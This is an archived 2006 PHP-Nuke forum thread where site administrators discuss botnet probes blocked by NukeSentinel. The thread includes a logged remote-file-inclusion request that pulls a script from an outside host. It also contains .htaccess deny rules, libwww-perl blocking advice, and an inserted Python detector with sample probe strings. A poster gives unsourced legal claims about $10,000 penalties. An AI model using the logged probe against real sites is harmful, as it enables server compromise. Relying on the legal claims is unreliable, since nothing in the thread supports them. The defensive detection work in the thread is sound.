leo51
Worker


Joined: Sep 09, 2004
Posts: 105
Location: Canada

Posted: Mon Nov 13, 2006 11:17 pm

I am trying to understand why someone continues to run these similar types of scripts on my site.

Today alone NukeSentinel logged 30 blocks from 30 different IPs, and these must be proxies. Look at the time range between 11:00 AM and 12 noon: there were no less than 20. The flags of the 30 IPs show Australia, but a NeoTrace terminates the IPs in different US states.

The attempts increased today, and that might be a result of my blocking some ranges on Sunday evening.

This has been going on for more than four months; at least there were about two blocks every so often, but whoever it is seems to have gotten bad.

QUESTION: What is the person trying to accomplish?


Date & Time: 2006-11-13 09:54:54 CST GMT -0600
Blocked IP: 66.70.189.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.65
Query String:
Only registered users can see links on this board!
Get registered or login to the forums!

Get String:

Thanks
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 4887

Posted: Mon Nov 13, 2006 11:25 pm

Don't waste your time trying to understand why attackers do so. This can be easily stopped by adding authentication on your modules/Forums/admin directory. If you search the forums here, you can find specific details for doing this, and it's an important protection that will provide excellent protection without setting off NukeSentinel.
montego
Site Admin


Joined: Aug 29, 2004
Posts: 7487
Location: Arizona

Posted: Tue Nov 14, 2006 6:57 am

See this here:
Only registered users can see links on this board!
Get registered or login to the forums!
gregexp
The Mouse Is Extension Of Arm


Joined: Feb 21, 2006
Posts: 1472
Location: In front of a screen....HELP! lol

Posted: Tue Nov 14, 2006 7:45 pm

leo51 wrote:
I am trying to understand why someone continues to run these similar types of scripts on my site.



First I will approach this with an answer: someone is more than likely letting something such as a program do this, and that does not always register when it is blocked. When it does register, it will try to make the same attack but with something different, usually the IP.


leo51 wrote:

QUESTION: What is the person trying to accomplish?


Some would say just to know they can, and others would say to be malicious; this is more of a personal feeling and judgement on your own.

This should be the question, which both kguske and montego have stated:

How can I stop this?

They have linked you to the correct resources, and I recommend following the instructions provided.
evaders99
Moderator


Joined: Apr 30, 2004
Posts: 2853

Posted: Wed Nov 15, 2006 12:21 am

It is many botnet scripts. They are targeting all kinds of PHP injections and using an IRC script to control all of them. Hundreds... thousands of machines are affected. And they keep searching using Google and other search engines.

Their current flaw seems to be the use of libwww-perl, but that may change.
Digital-Overload
Hangin' Around


Joined: May 13, 2005
Posts: 26

Posted: Thu Nov 16, 2006 1:34 pm

I just got 69 emails from Sentinel with pretty much the same stuff, for the last 3 hours alone... And yes, I've been getting this and the admin user injection a lot over the past 5 or 6 months. I had to remove guestbooks and set harsh permissions for users to make sure I'm not getting any spam links added to news and the forums; so far the bots can register all they want, but they get deleted when it asks for my approval.... Now I'm getting some stupid script submitting news... lol, Ahmed or some shiz like that. But yeah, I got this like 100 times in the last week, and 69 just now when I checked my email, and decided to come on here and see if anyone else got hit like me... guess so...

Date & Time: 2006-11-16 09:57:37 Pacific Standard Time GMT -0800
Blocked IP: 219.93.90.33 (I have about 345 different IPs in the .htaccess already for this type of attack)
User ID: Anonymous (1)
Reason: Abuse-Harvest
String Match: libwww-perl
--------------------
User Agent: libwww-perl/5.65
Query String:<SITE ROOT><A BUnch Of Subfolders>/admin_styles.php?phpbb_root_path=http://www.superlist.gen.tr/lol1.txt?
Get String: <SITE ROOT> <A Bunch Of Subfolders>/admin_styles.php?phpbb_root_path=http://www.superlist.gen.tr/lol1.txt?
Post String: <SITE ROOT> <BUNCH OF Sub Folders>/admin_styles.php
Forwarded For: none
Client IP: none
Remote Address: 219.93.90.33
Remote Port: none
Request Method: GET
jakec
Moderator


Joined: Feb 06, 2006
Posts: 1853
Location: United Kingdom

Posted: Thu Nov 16, 2006 1:46 pm

See this post about how to block this type of attack before it gets to Sentinel:
Only registered users can see links on this board!
Get registered or login to the forums!
64bitguy
The Mouse Is Extension Of Arm


Joined: Mar 06, 2004
Posts: 1140
Location: Manchester, NH USA

Posted: Thu Nov 16, 2006 2:07 pm

I believe you are going to start seeing a lot more abuse out of Turkey.

My personal position is to completely block the entire country, either through NukeSentinel or via .htaccess or both, but that's just me. As their government doesn't care about people hosting abusive malicious code, I don't care about giving them any access or allowing their referers.

.htaccess
Code:
# Refuse any request whose Referer header names a Turkish second-level domain
RewriteEngine On
RewriteCond %{HTTP_REFERER} gen\.tr [NC,OR]
RewriteCond %{HTTP_REFERER} com\.tr [NC,OR]
RewriteCond %{HTTP_REFERER} org\.tr [NC,OR]
RewriteCond %{HTTP_REFERER} net\.tr [NC]
RewriteRule .* - [F]


You get the idea. There are probably easier ways to do this, but it works for me.
evaders99
Moderator


Joined: Apr 30, 2004
Posts: 2853

Posted: Thu Nov 16, 2006 7:09 pm

You are seeing a lot of abuse from across the world. It is due to many of the botnet scripts with hundreds or thousands of compromised servers. Turkey seems to be the choice for the direct script kiddies, but these libwww-perl attacks are much more than that.
technocrat
Involved


Joined: Jul 07, 2005
Posts: 492

Posted: Fri Nov 17, 2006 10:50 am

Blocking Turkey is not going to help much in this situation. The problem is that someone from one of the hacking teams wrote the Perl script to exploit this hole. Then a script kiddie website wrote a long set of directions on every step of how to use this.

Then the biggest script kiddie site out there took those directions and updated them (including how to use proxies) and posted them on their forums. It EXPLODED after that. Now every script kiddie with even a small amount of knowledge and a few proxy IPs can use this.

On the main Evo site Sentinel blocks 200 a day. The most effective solution has been to use the .htaccess Perl rewrite. It completely took it off the radar.
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 4868

Posted: Fri Nov 17, 2006 11:02 am

I was getting around 200 emails too, over a couple of hours each day.
64bitguy
The Mouse Is Extension Of Arm


Joined: Mar 06, 2004
Posts: 1140
Location: Manchester, NH USA

Posted: Fri Nov 17, 2006 3:02 pm

I agree that Turkey isn't "alone" in this regard. Personally, I block quite a few countries simply because:

a) They have nothing to offer to my community of users.
b) They only want access for abusive purposes, including these illegal attacks.

In either case, thank you IP2C and other tools that help in blocking access. I think my original point was there is more than one way to skin a cat (thank you Apache).

As a couple of thoughts:
1) I see the strengths in blocking libwww-perl; however, keep in mind that if you spend your time doing site diagnostics (as I do), this function can be extremely useful, especially when examining compliance and statistical information regarding your site. (If you ever block yourself when running a W3C Validator, this is why! Don't forget to remove the blocker when doing that kind of work).

2) One of the benefits to seeing an attack like this is the ability to take action regarding it. While seeking revenge is stupid, people need to remember that these kinds of malicious probes and intrusions are a violation of United States law; specifically,
Only registered users can see links on this board!
Get registered or login to the forums!
.

Please remember that under the law, the company hosting is just as guilty as the user, once that information has been identified in writing to the host.

In other words, when you see ANYONE hosting malicious scripts, you should notify the host, remind them of the law and also threaten punitive action of $10,000.00 per incident as is your right under the law.

Does this work? Darn right it does. I have reported domains after seeing extensive attacks. I do this by looking up the host info at
Only registered users can see links on this board!
Get registered or login to the forums!
and then forward off a copy of the abuse message with a nice little form letter that I have already prepared to the host of the abusive scripts. I know of at least 50 instances where my actions had domains shut down. It may not solve the problem, but it does hurt the attacker's pocketbook, as illegal abuse voids a hosting agreement. Remember that the
Only registered users can see links on this board!
Get registered or login to the forums!
is there for you too. People often complain about the hassle, but they have teeth and don't mind using them. Stealing administration information and passwords is a serious crime. It should be treated as such.

I can only emphasize that people should simply not lay down when attacked, fight back where you can and block where you don't want to bother. Obviously, a host in Turkey could care less about the law, which is why I simply choose to block the country entirely, as well as many other countries that operate in a similar manner of Internet lawlessness.

Finally, (and I guess this goes without saying... but regardless) everyone should also be checking their sites to ensure software is adequately patched against the results of a successful attack.
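As an added example, not code from this thread, from NukeSentinel or from PHP-Nuke, the Python script below parses block notices in the layout Digital-Overload quoted and flags the two signals the thread turns on: a query parameter whose value is a remote URL (the remote file inclusion probe in the admin_styles.php?phpbb_root_path=http://... record) and a libwww-perl User-Agent (the string the .htaccess rewrite technocrat and jakec recommend keys on). It then tallies blockable requests per source IP and per clock hour, the way leo51 eyeballed the 11:00 to 12:00 burst. The sample notices are constructed (documentation IP ranges, made-up host), and the W3C_Validator allow-list marker is an assumption added to illustrate 64bitguy's caveat about blocking your own diagnostic tools, which also identify themselves with a libwww-perl suffix. The script generalises past the one admin_styles.php case: any parameter name and any http, https or ftp value counts as a probe.

```python
"""Classify NukeSentinel-style block notices for RFI probes and libwww-perl clients."""
import re
from collections import Counter
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Constructed sample notices in the layout of the Sentinel mails quoted in the
# thread. Addresses come from documentation ranges; the remote host is made up.
SAMPLE_NOTICES = """\
Date & Time: 2006-11-16 09:57:37 CST GMT -0600
Blocked IP: 203.0.113.10
User Agent: libwww-perl/5.65
Get String: /forums/admin/admin_styles.php?phpbb_root_path=http://example.invalid/lol1.txt?
--------------------
Date & Time: 2006-11-16 10:02:11 CST GMT -0600
Blocked IP: 203.0.113.11
User Agent: libwww-perl/5.65
Get String: /forums/admin/admin_styles.php?phpbb_root_path=http://example.invalid/lol1.txt?
--------------------
Date & Time: 2006-11-16 10:40:00 CST GMT -0600
Blocked IP: 198.51.100.7
User Agent: W3C_Validator/1.432 libwww-perl/5.805
Get String: /index.php
--------------------
Date & Time: 2006-11-16 11:15:42 CST GMT -0600
Blocked IP: 203.0.113.10
User Agent: Mozilla/5.0 (compatible)
Get String: /index.php?name=News&file=article&sid=42
--------------------
Date & Time: 2006-11-16 11:31:09 CST GMT -0600
Blocked IP: 203.0.113.10
User Agent: libwww-perl/5.65
Get String: /modules/Forums/admin/index.php?phpbb_root_path=ftp://example.invalid/cmd.txt?
"""

# A parameter value that is itself an absolute URL is the RFI signature.
RFI_VALUE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)

# Assumed allow-list (not from the thread): the W3C validator of that era sent a
# libwww-perl suffix, so a bare libwww-perl block would lock out your own checks.
ALLOWED_UA_MARKERS = ("W3C_Validator",)


def parse_notices(text):
    """Split the mail text on its dashed separators into field -> value dicts."""
    notices = []
    for chunk in re.split(r"^-{5,}\s*$", text, flags=re.MULTILINE):
        fields = {}
        for line in chunk.strip().splitlines():
            # Only the first colon separates the field name; the Date & Time
            # and Get String values contain colons of their own.
            key, sep, value = line.partition(":")
            if sep:
                fields[key.strip()] = value.strip()
        if fields:
            notices.append(fields)
    return notices


def classify(notice):
    """Return the set of tags ('rfi', 'libwww-perl', 'allowlisted') for one notice."""
    tags = set()
    ua = notice.get("User Agent", "")
    if "libwww-perl" in ua.lower():
        tags.add("libwww-perl")
    if any(marker in ua for marker in ALLOWED_UA_MARKERS):
        tags.add("allowlisted")
    query = urlsplit(notice.get("Get String", "")).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if RFI_VALUE.match(value):
            tags.add("rfi")
            break
    return tags


def would_block(tags):
    """Block rule: any RFI probe or libwww-perl client unless explicitly allow-listed."""
    return bool(tags & {"rfi", "libwww-perl"}) and "allowlisted" not in tags


def summarize(notices):
    """Count blockable notices per source IP and per clock hour."""
    per_ip = Counter()
    per_hour = Counter()
    for notice in notices:
        if not would_block(classify(notice)):
            continue
        per_ip[notice["Blocked IP"]] += 1
        # Trim the 'CST GMT -0600' suffix Sentinel appends before parsing.
        stamp = datetime.strptime(notice["Date & Time"][:19], "%Y-%m-%d %H:%M:%S")
        per_hour[stamp.strftime("%Y-%m-%d %H:00")] += 1
    return per_ip, per_hour


if __name__ == "__main__":
    per_ip, per_hour = summarize(parse_notices(SAMPLE_NOTICES))
    for ip, n in per_ip.most_common():
        print(f"{ip:15} {n} blockable request(s)")
    for hour, n in sorted(per_hour.items()):
        print(f"{hour}  {n}")
```

Run stand-alone it prints the per-IP and per-hour tallies for the constructed notices; pointed at a mailbox export of real Sentinel notices, the per-hour counter shows bursts like the one leo51 described, and the per-IP counter is the list you would feed into an .htaccess deny rule. Keep the allow-list narrow: it exists only so that a User-Agent rule does not block your own validator runs, and it should never match on a substring an attacker can trivially add.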
leo51
Worker


Joined: Sep 09, 2004
Posts: 105
Location: Canada

Posted: Fri Nov 17, 2006 11:05 pm

OK, thanks guys for all of the input. I now have a better understanding of what has been going on. And yes, I was blocking these IP ranges, but it started to be a nuisance and was taking up too much of my time. Also, I was thinking that some hater was again trying to make me reduce my numbers once I blocked so many countries and ranges.

About a year and a half ago, I had to block out almost the whole of Europe and Florida and start giving individuals access once they sent an email with their IP. One guy living in Europe and one in Florida (two friends) went on a rampage, posting drunk all over my forms, guestbook, request form, forums, just about anywhere on the sites where it was possible to post. They just created new users and came back, using proxies, the RIPE network and dialup.

Anyway, it was good that I made this post; it helped me understand a whole lot about the situation.

Again, Many Thanks
evaders99
Moderator


Joined: Apr 30, 2004
Posts: 2853

Posted: Sun Nov 19, 2006 8:34 pm

Yep, definitely report them. Any site that can be secured will stop hundreds of attempts against other hosts. Mostly, these sites are compromised and the host may not even know it. So use domaintools or whatever you prefer, send an email to the technical contacts, and hope they do something.